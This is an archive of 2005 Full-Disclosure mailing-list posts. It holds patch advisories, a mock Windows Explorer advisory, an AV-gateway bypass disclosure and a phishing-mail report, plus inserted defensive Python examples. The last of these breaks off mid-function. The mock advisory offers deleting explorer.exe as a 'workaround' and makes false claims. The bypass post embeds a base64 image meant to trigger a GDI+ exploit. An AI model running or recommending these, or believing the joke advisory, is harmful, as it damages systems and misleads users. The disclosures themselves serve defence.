- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: HIGH
 Title: EXPLORER: Vulnerability in all versions of Windows Explorer
  Date: January 11, 2005

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple overflows have been found in Windows Explorer, potentially
allowing a remote user to open Explorer and run files remotely.


Background
==========

Windows Explorer is an advanced browsing tool made by Microsoft. It
is used in daily tasks to open folders, copy files, delete files, rename
files and view files on a system. It is the foundation of the World Wide
Web and used by billions worldwide. It runs on an array of machines.


Affected versions
=================

All versions of Windows' Explorer are vulnerable

Description
===========

Shogun Suzuki discovered that a remote user can connect to any
machine via numerous exploits and use Windows Explorer to view files,
rename files, delete files, change permissions on files stored on a
remote machine that has been pwned.

Impact
======

A remote attacker could install something similar to PCAnywhere
after exploiting Windows and use Windows' Explorer to view, copy
and or open any file on a victims machine.

Workaround
==========

On a command prompt: del C:\WINDOWS\explorer.exe


Concerns?
=========

Security is a primary focus of TEAM PWN4GE and ensuring the
progress of secure Windows machines be our dreams. As security
concerns should be addressed to respective vendors, we feel the
urge to bypass standards and bring our common dreams of a
secure homeland to the Interweb.

License
=======

Copyright 2005 TEAM PWN4GE

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


[Full-Disclosure] MDKSA-2005:005 - Updated nfs-utils packages fix 64bit vulnerability

2005-01-11 Thread Mandrake Linux Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandrakelinux Security Update Advisory
 ___

 Package name:   nfs-utils
 Advisory ID:MDKSA-2005:005
 Date:   January 11th, 2005

 Affected versions:  10.0, 10.1, 9.2, Corporate Server 2.1
 __

 Problem Description:

 Arjan van de Ven discovered a buffer overflow in rquotad on 64bit
 architectures; an improper integer conversion could lead to a
 buffer overflow.  An attacker with access to an NFS share could send a
 specially crafted request which could then lead to the execution of
 arbitrary code.
 
 The updated packages are provided to prevent this issue.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0946
 __

 Updated Packages:
  
 Mandrakelinux 10.0:
 71991bf34674e4bebd4870c24dce4929  10.0/RPMS/nfs-utils-1.0.6-2.2.100mdk.i586.rpm
 1c6231362def3c56d747b3ccc22b7597  
10.0/RPMS/nfs-utils-clients-1.0.6-2.2.100mdk.i586.rpm
 bf52589c8d97f63f3024f90a79c201c9  10.0/SRPMS/nfs-utils-1.0.6-2.2.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 28bc6309e5488cd7bf294ae1a4ce68b2  
amd64/10.0/RPMS/nfs-utils-1.0.6-2.2.100mdk.amd64.rpm
 ed8b7dfa77200e5badb473678a91bb2a  
amd64/10.0/RPMS/nfs-utils-clients-1.0.6-2.2.100mdk.amd64.rpm
 bf52589c8d97f63f3024f90a79c201c9  
amd64/10.0/SRPMS/nfs-utils-1.0.6-2.2.100mdk.src.rpm

 Mandrakelinux 10.1:
 bb7161793b2154c3e122adabaed9ed60  10.1/RPMS/nfs-utils-1.0.6-2.2.101mdk.i586.rpm
 e219e85405758a9ef9511eacf4118e07  
10.1/RPMS/nfs-utils-clients-1.0.6-2.2.101mdk.i586.rpm
 7510d378225740169ae1a3dbaf0f223f  10.1/SRPMS/nfs-utils-1.0.6-2.2.101mdk.src.rpm

 Mandrakelinux 10.1/X86_64:
 ed70043e2d95cbebc2cd12e0f973a29f  
x86_64/10.1/RPMS/nfs-utils-1.0.6-2.2.101mdk.x86_64.rpm
 7c086dfb028423e910552594aff5  
x86_64/10.1/RPMS/nfs-utils-clients-1.0.6-2.2.101mdk.x86_64.rpm
 7510d378225740169ae1a3dbaf0f223f  
x86_64/10.1/SRPMS/nfs-utils-1.0.6-2.2.101mdk.src.rpm

 Corporate Server 2.1:
 cc1b1f4c8232db49f40df9117d2237f8  
corporate/2.1/RPMS/nfs-utils-1.0.1-1.3.C21mdk.i586.rpm
 8af58044e57d46921c0ad8745826d1dd  
corporate/2.1/RPMS/nfs-utils-clients-1.0.1-1.3.C21mdk.i586.rpm
 9d167452a31fc1e5ef4f43086f0d7b34  
corporate/2.1/SRPMS/nfs-utils-1.0.1-1.3.C21mdk.src.rpm

 Corporate Server 2.1/x86_64:
 c7f8d994d4d261d41f6bf246c280fb10  
x86_64/corporate/2.1/RPMS/nfs-utils-1.0.1-1.3.C21mdk.x86_64.rpm
 77be17723eb840715500edb3cf8c687b  
x86_64/corporate/2.1/RPMS/nfs-utils-clients-1.0.1-1.3.C21mdk.x86_64.rpm
 9d167452a31fc1e5ef4f43086f0d7b34  
x86_64/corporate/2.1/SRPMS/nfs-utils-1.0.1-1.3.C21mdk.src.rpm

 Mandrakelinux 9.2:
 00f2319415647d9fa85926cc05271793  9.2/RPMS/nfs-utils-1.0.5-1.2.92mdk.i586.rpm
 680ef7be663350d18ad5b7f94bbc2e21  
9.2/RPMS/nfs-utils-clients-1.0.5-1.2.92mdk.i586.rpm
 4a49c7508d166c62b6d76e7c1cccbacd  9.2/SRPMS/nfs-utils-1.0.5-1.2.92mdk.src.rpm

 Mandrakelinux 9.2/AMD64:
 c0e275ce5838575eda14efb2d582aefc  
amd64/9.2/RPMS/nfs-utils-1.0.5-1.2.92mdk.amd64.rpm
 779856f22f146342ab6e42c4f20acd95  
amd64/9.2/RPMS/nfs-utils-clients-1.0.5-1.2.92mdk.amd64.rpm
 4a49c7508d166c62b6d76e7c1cccbacd  
amd64/9.2/SRPMS/nfs-utils-1.0.5-1.2.92mdk.src.rpm
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security.  You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFB5F0emqjQ0CJFipgRAg3wAKDBYs/rXJUwddiDT27a+ij2yMOS7QCfY11g
cDdxBS2vNnkYW79o+n63YRk=
=ggoY
-END PGP SIGNATURE-


Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

2005-01-11 Thread Darren Bounds
Hello Danny,
This vulnerability is only applicable to the HTTP data while in
transit. Once received by the client the image will be rendered and
subsequently detected by local AV software, if installed.

At the present time, I'm not aware of any AV, IDS or IPS vendor that
will detect malicious images embedded in HTML in this manner.

Thank you,
Darren Bounds
Intrusense, LLC.
--
Intrusense - Securing Business As Usual

On Jan 11, 2005, at 2:14 PM, Danny wrote:
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<[EMAIL PROTECTED]> wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005
A vulnerability has been discovered which allows a remote attacker to
bypass anti-virus (as well other security technologies such as IDS and
IPS) inspection of HTTP image content.

By leveraging techniques described in RFC 2397 for base64 encoding
image content within the URL scheme. A remote attack may encode a
malicious image within the body of an HTML formatted document to
circumvent content inspection.

For example:
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
The source code at the URL above will by default create a JPEG image
that will attempt (and fail without tweaking) to exploit the Microsoft
MS04-028 GDI+ vulnerability. The image itself is detected by all AV
gateway engines tested (Trend, Sophos and McAfee), however, when the
same image is base64 encoded using the technique described in RFC 2397
(documented below), inspection is not performed and is delivered
rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL
scheme; Firefox, Safari, Mozilla and Opera do and will render the data
and thus successfully execute the payload if the necessary OS and/or
application patches have not been applied.
## BEGIN HTML ##



src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
/ 
X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF 
B
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/ 
bAEMACAYGBwYFCAcHBwkJ
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv 
/b
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj 
Iy
MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/ 
xAAfAAABBQEBAQEBAQAA
AQIDBAUGBwgJCgv/ 
xAC1EAACAQMDAgQDBQUEBX0BAgMABBEFEiExQQYTUWEHInEUMoGR
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2 
Rl
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc 
bH
yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/ 
xAAfAQADAQEBAQEBAQEB
AQIDBAUGBwgJCgv/ 
xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm 
Nk
ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8 
TF
xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/ 
APn+iiigD//
Z">



## END HTML ##
Solution:
While AV vendor patches are not yet available, fixes for all currently
known image vulnerabilities are and have been for several months.  If
you have not yet applied them, you have your own negligence to blame.
Contributions:
Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in
platform testing.
I believe TrendMicro's OfficeScan (client-server scanner) will catch
it, but I am not sure about their gateway device. What was their
response?
...D
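The gap described in Darren Bounds's advisory (quoted above and in Mark Senior's reply) and widened by Michael Holzt's executable variant is that a gateway scanning the HTTP stream never sees the decoded bytes. The following is an added example, not code from either poster or from any of the vendors named: it pulls RFC 2397 data: URLs out of an HTML document, base64-decodes them (or percent-decodes the non-base64 form), and compares the declared media type against the payload's magic bytes, flagging the advisory's case of a JPEG declared as image/gif (its base64 opens with /9j/, i.e. FF D8 FF) and the putty.html case of an MZ executable behind a link. The sample page and its payloads are constructed here; the magic-byte table is a small hand-made one, and a real gateway would hand the decoded bytes to its scanning engine rather than stop at sniffing.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple
from urllib.parse import unquote_to_bytes

# RFC 2397 syntax: data:[<mediatype>][;base64],<data>
# The payload may run across line breaks inside an attribute value, as it
# did in the advisory's HTML, so it is matched up to the closing quote.
DATA_URL_RE = re.compile(
    r"""data:(?P<mediatype>[^,;'"\s]*)(?P<params>(?:;[^,;'"\s]*)*),(?P<payload>[^'">]*)""",
    re.IGNORECASE,
)

# Constructed magic-byte table, just enough for this example.
MAGIC: List[Tuple[bytes, str]] = [
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"MZ", "application/x-msdos-program"),
]


@dataclass
class Finding:
    declared: str          # media type the data: URL claims
    actual: Optional[str]  # media type the magic bytes say
    size: int
    reason: str


def sniff(data: bytes) -> Optional[str]:
    for magic, media_type in MAGIC:
        if data.startswith(magic):
            return media_type
    return None


def decode_data_urls(html: str) -> Iterator[Tuple[str, bytes]]:
    """Yield (declared media type, decoded bytes) for every data: URL."""
    for m in DATA_URL_RE.finditer(html):
        declared = (m.group("mediatype") or "text/plain").lower()
        params = m.group("params").lower().split(";")
        payload = re.sub(r"\s+", "", m.group("payload"))  # undo mail/HTML wrapping
        if "base64" in params:
            try:
                data = base64.b64decode(payload)
            except binascii.Error:
                continue  # undecodable: a real gateway should block, not skip
        else:
            data = unquote_to_bytes(payload)
        yield declared, data


def inspect_html(html: str) -> List[Finding]:
    """Flag payloads whose bytes contradict their label or are executables."""
    findings: List[Finding] = []
    for declared, data in decode_data_urls(html):
        actual = sniff(data)
        if actual == "application/x-msdos-program":
            findings.append(Finding(declared, actual, len(data), "executable payload"))
        elif actual is not None and actual != declared:
            findings.append(Finding(declared, actual, len(data), "media type mismatch"))
        elif declared.startswith("image/") and actual is None:
            findings.append(Finding(declared, actual, len(data), "unrecognised image data"))
    return findings


def build_sample_html() -> str:
    """Constructed page: a JPEG labelled image/gif (as in the advisory),
    an honest GIF, and an MZ executable behind a link (as in putty.html)."""
    jpeg_as_gif = base64.b64encode(b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 8).decode()
    honest_gif = base64.b64encode(b"GIF89a" + b"\x00" * 10).decode()
    exe = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 12).decode()
    # wrap the first payload over several lines the way the advisory's was
    wrapped = "\n".join(jpeg_as_gif[i:i + 16] for i in range(0, len(jpeg_as_gif), 16))
    return (
        "<html><body>\n"
        f'<img src="data:image/gif;base64,{wrapped}">\n'
        f'<img src="data:image/gif;base64,{honest_gif}">\n'
        f'<a href="data:application/x-msdos-program;base64,{exe}">Click me!</a>\n'
        "</body></html>\n"
    )


if __name__ == "__main__":
    for finding in inspect_html(build_sample_html()):
        print(finding)
```

Two caveats a practitioner would add. First, this only helps at the gateway: as Darren says in his reply, once the client decodes and renders the image, host AV sees the same bytes it would have seen in a normal download, so the patch level of the client remains the real fix. Second, the decision on undecodable or oversized payloads belongs in policy, not in a `continue`; the example skips them only to keep the scan total small.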


Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread vh
On Wed, 12 Jan 2005 06:52:04 +0800
"Team Pwnge" <[EMAIL PROTECTED]> wrote:

> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> TEAM PWN4GE Security Advisory PWNED
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> 
>   Severity: HIGH
>  Title: EXPLORER: Vulnerability in all versions of Windows Explorer
>   Date: January 11, 2005
> 
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> 
> Synopsis
> ========
> 
> Multiple overflows have been found in Windows Explorer, potentially
> allowing a remote user to open Explorer and run files remotely.
> 
> 
> Background
> ==========
> 
> Windows Explorer is an advanced browsing tool made by Microsoft. It
> is used in daily tasks to open folders, copy files, delete files,
> rename files and view files on a system. It is the foundation of the
> World Wide Web and used by billions worldwide. It runs on an array of
> machines.
> 
> 
> Affected versions
> =================
> 
> All versions of Windows' Explorer are vulnerable
> 
> Description
> ===========
> 
> Shogun Suzuki discovered that a remote user can connect to any
> machine via numerous exploits and use Windows Explorer to view files,
> rename files, delete files, change permissions on files stored on a
> remote machine that has been pwned.
> 
> Impact
> ======
> 
> A remote attacker could install something similar to PCAnywhere
> after exploiting Windows and use Windows' Explorer to view, copy
> and or open any file on a victims machine.
> 
> Workaround
> ==========
> 
> On a command prompt: del C:\WINDOWS\explorer.exe

Isn't explorer the program which "shows" you the desktop?
Just a clue: Use Open-, Net- or FreeBSD.
These OSs are good enough for all normal tasks you have to do.

Real Workaround: Change the OS 
There's no other way, or you like to wait
5 months for a patch. You have to wait at least 4 weeks because MS don't
provide patches just because there's something critical. Oh no.. they've
their "Patch-Day". Something like a game-show but even worse
because you don't get patches for all holes even if you did everything
right.

> License
> =======
> 
> Copyright 2005 TEAM PWN4GE
> 
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.

Mails are FREE...
But sometimes Linux-Users need licenses for everything...


[Full-Disclosure] UnixWare 7.1.4 UnixWare 7.1.3 UnixWare 7.1.1 : mountd remote denial of service

2005-01-11 Thread please_reply_to_security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



__

SCO Security Advisory

Subject:        UnixWare 7.1.4 UnixWare 7.1.3 UnixWare 7.1.1 : mountd remote denial of service
Advisory number:SCOSA-2005.1
Issue date: 2005 January 11
Cross reference:sr892156 fz530479 erg712731 CAN-2004-1039
__


1. Problem Description

mountd is not enabled by default. But when the NFS mountd service
is run by inetd, if an NFS mount-related request is received
from a remote (or local) host, inetd will repeatedly
create the mountd process and as a result increasingly
consume memory. 

The Common Vulnerabilities and Exposures project (cve.mitre.org) 
has assigned the name CAN-2004-1039 to this issue.


2. Vulnerable Supported Versions

System                  Binaries
----------------------------------------------------------------------
UnixWare 7.1.4          /usr/lib/nfs/tmp/mountd
UnixWare 7.1.3          /usr/lib/nfs/tmp/mountd
UnixWare 7.1.1          /usr/lib/nfs/mountd

3. Solution

The proper solution is to install the latest packages.

4. UnixWare 7.1.4 / UnixWare 7.1.3

4.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.1

4.2 Verification

MD5 (erg712731.pkg.Z) = 69067669ac277725e8665ac02f955607

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools

4.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

Download erg712731.pkg.Z to the /var/spool/pkg directory

# uncompress /var/spool/pkg/erg712731.pkg.Z
# pkgadd -d /var/spool/pkg/erg712731.pkg


5. UnixWare 7.1.1

5.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.1


5.2 Verification

MD5 (erg712731.711.pkg.Z) = 4f7e3bba1e5381e28bef0894dc1d9ec1

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools


5.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

Download erg712731.711.pkg.Z to the /var/spool/pkg directory

# uncompress /var/spool/pkg/erg712731.711.pkg.Z
# pkgadd -d /var/spool/pkg/erg712731.711.pkg


6. References

Specific references for this advisory:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1039
http://www.nilesoft.co.kr/

SCO security resources:
http://www.sco.com/support/security/index.html

SCO security advisories via email
http://www.sco.com/support/forums/security.html

This security fix closes SCO incidents sr892156 fz530479
erg712731.


7. Disclaimer

SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers
intended to promote secure installation and use of SCO
products.


8. Acknowledgments

SCO would like to thank Yun Jonglim, a security researcher
at NileSOFT, Ltd (www.nilesoft.co.kr), for reporting this
issue.

__



Re: [Full-Disclosure] MediaSentry false positives?

2005-01-11 Thread Kevin
On Wed, 05 Jan 2005 13:00:41 +0100, Florian Weimer <[EMAIL PROTECTED]> wrote:
> Kevin Kadow wrote:
> > Has anybody received "Notice of claimed infringement" from MediaSentry
> > for IP addresses which, while registered to you or your organization,
> > are in a range not actively in use?
> 
> I've independently received another report of this problem.
> 
> > I see two likely possibilities -- either MediaSentry is not using due
> > diligence in verifying that the material for which they send
> > infringement notices is actually shared from the address they show in
> > the complaint,  or somebody on the Internet is spoofing BGP route
> > announcements for unused address space out of larger allocations.
> 
> RIPE doesn't have an announcement of the prefix, so I think
> MediaSentry was in error.
> 
> I don't think it makes sense for MediaSentry to check their findings
> more closely from a business perspective.  They don't try to download
> the infringing material to confirm that redistribution actually takes
> place, either.

Sounds like an opportunity to take down MediaSentry.

The "takedown" notices state the following:

] On behalf of , owner of the exclusive rights to the
] copyrighted material at issue in this notice, we hereby state, that
] we have a good faith belief that use of the material in the manner
] complained of is not authorized by , its respective
] agents, or the law.
]
] Also, we hereby state, under penalty of perjury, under the laws of
] the State of California and under the laws of the United States, that the
] information in this notification is accurate and that we are authorized 
] to act on behalf of the owner of the exclusive rights being infringed
] as set forth in this notification.

Given the references to "good faith" and "perjury" in the above text,
if the data collection methods employed by MediaSentry are
demonstrably faulty, falsely implicate source IP addresses not
actually participating in file sharing (not a spoofed BGP route,
rather a bogus entry in the Kazaa or eDonkey indexes showing the wrong
source IP), MediaSentry may no longer be protected by the "good faith"
clause?

Kevin


[Full-Disclosure] RE: Full-Disclosure: Interesting but suspicious possible phishing mail

2005-01-11 Thread RandallM
Have been getting a number of these coming through at work also.
Of course all the users are asking me questions about these.
They all have the strange words, paragraphs, and questions like this one.
They really got my attention. I at first thought they were hidden messages,
but not so, as the ones we receive come as text.

thank you
Randall M
 
 

<|>--
<|>
<|>Message: 4
<|>Date: Tue, 11 Jan 2005 02:27:55 +
<|>From: "DAN MORRILL" <[EMAIL PROTECTED]>
<|>Subject: [Full-Disclosure] Interesting but suspicious possible
<|> phishing mail
<|>To: full-disclosure@lists.netsys.com
<|>Message-ID: <[EMAIL PROTECTED]>
<|>Content-Type: text/plain; format=flowed
<|>
<|>Hi folks,
<|>
<|>Got this really interesting mail in my box today, and 
<|>knowing that I haven't 
<|>used that e-mail address or ordered anything on line lately. 
<|>Wondering if it 
<|>might not be a phishing e-mail. Haven't seen anything like 
<|>this before. 
<|>Anyone see anything similar?
<|>r/
<|>Dan
<|>
<|>
<|>
<|>from :  Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
<|>Sent :  Monday, January 10, 2005 10:40 PM
<|>To :  "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
<|>CC :  [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
<|>[EMAIL PROTECTED], [EMAIL PROTECTED]
<|>Subject :  Shipping Notification, Tracking Number : 
<|>TCD461649887242ESB
<|>
<|>MIME-Version: 1.0
<|>Received: from msnmail2.uswest.net ([63.226.138.22]) by 
<|>mc10-f38.hotmail.com 
<|>with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
<|>Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -
<|>Received: from unknown (63.226.138.18) by 
<|>msnmail2.uswest.net with QMQP; 10 
<|>Jan 2005 22:45:55 -
<|>Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
<|>Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
<|>mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
<|>X-Message-Info: JGTYoYF78jHm2Kmrh/becsOSGajhcE+aqhdcaXLDOFI=
<|>Delivered-To: [EMAIL PROTECTED]
<|>X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
<|>Fuz1=4Fuz2=4
<|>Return-Path: [EMAIL PROTECTED]
<|>X-OriginalArrivalTime: 10 Jan 2005 22:45:54.0814 (UTC) 
<|>FILETIME=[24BA71E0:01C4F766]
<|>
<|>
<|>
<|>
<|>Content-Type: multipart/mixed; 
<|>boundary="-mpls-cmx-12.inet.qwest.net-1105397155-56110"
<|>
<|>
<|>Content-Type: text/plain
<|>
<|>
<|>This email was forwarded from your previous Qwest.net email address
<|>to your MSN email address.  To discontinue email forwarding for any
<|>future emails sent to your previous Qwest.net email address, please
<|>contact MSN Customer Service.
<|>
<|>
<|>
<|>
<|>
<|>Content-Type: message/rfc822
<|>Content-Description: forwarded message
<|>Content-Transfer-Encoding: 8bit
<|>Content-Disposition: inline
<|>
<|>
<|>From: Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
<|>To: "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
<|>Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
<|>[EMAIL PROTECTED], 
<|>[EMAIL PROTECTED]
<|>Subject: Shipping Notification, Tracking Number : TCD461649887242ESB
<|>Sent: Monday, January 10, 2005 10:40 PM
<|>MIME-Version: 1.0
<|>Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
<|>Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
<|>mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
<|>X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
<|>Fuz1=4Fuz2=4 Content-Type: multipart/alternative; 
<|>boundary="--Part_GRKDac7J6.oMXawOLoYO4"
<|>
<|>
<|>Content-Type: text/html; format=flowed; charset=iso-8859-15
<|>Content-Transfer-Encoding: quoted-printable
<|>
<|>Check your status Below:
<|>
<|>cov2pa.com/track.asp?cg=1&c=tc
<|>
<|>The illiterate of the 21st century will not be those who 
<|>cannot read and 
<|>write, but those who cannot learn, unlearn, and relearn. 
<|>Alvin Toffler
<|>Those police officers are practicing driving between the two 
<|>buildings.
<|>The illiterate of the 21st century will not be those who 
<|>cannot read and 
<|>write, but those who cannot learn, unlearn, and relearn. 
<|>Alvin Toffler
<|>Haven't the photographers already disliked praying?
<|>Few things are harder to put up with than the annoyance of a 
<|>good example.
<|>3
<|>When people are free to do as they please, they usually 
<|>imitate each other. 
<|>-Eric Hoffer (1902-1983)
<|>Have you already loved sleeping?
<|>
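The first thing to do with a mail like this is read the Received: chain from the bottom up; as an added example (not from the thread), the script below does that over a sample reconstructed from the headers quoted above and reports the earliest relay plus two cheap red flags. Assumptions: the addresses are the archive's [EMAIL PROTECTED] placeholders, the zone offsets the archive truncated are restored as -0000, and the body is treated as plain text although the real mail was multipart.

```python
"""Walk the Received: chain of a suspicious mail and surface where it entered the network.

Added example, not from the thread. SAMPLE is reconstructed from the headers
quoted above; the addresses are the archive's [EMAIL PROTECTED] placeholders.
"""
import email
import re

SAMPLE = """\
Received: from msnmail2.uswest.net ([63.226.138.22]) by mc10-f38.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -0000
Received: from unknown (63.226.138.18) by msnmail2.uswest.net with QMQP; 10 Jan 2005 22:45:55 -0000
Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -0000
Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -0000
From: Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
To: "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
Subject: Shipping Notification, Tracking Number : TCD461649887242ESB

Check your status Below:

cov2pa.com/track.asp?cg=1&c=tc
"""

# "from <host> (<ip>) by <host>" or "from <host> ([<ip>]) by <host>"
HOP_RE = re.compile(
    r"from\s+(?P<src>\S+)\s+\(\[?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]?\)\s+by\s+(?P<dst>\S+)")
# rDNS names typical of dynamic customer pools, which order systems rarely send from
DYNAMIC_HINTS = ("adsl", "dsl", "dyn", "cust", "pool", "dial")
# a host/path on its own line with no scheme, as in the body above
BARE_LINK_RE = re.compile(r"^[ \t]*((?:[a-z0-9-]+\.)+[a-z]{2,}/\S*)", re.I | re.M)
ADDR_RE = re.compile(r"<([^>]+)>")


def received_hops(raw):
    """Relay hops in chronological order (earliest hop first).

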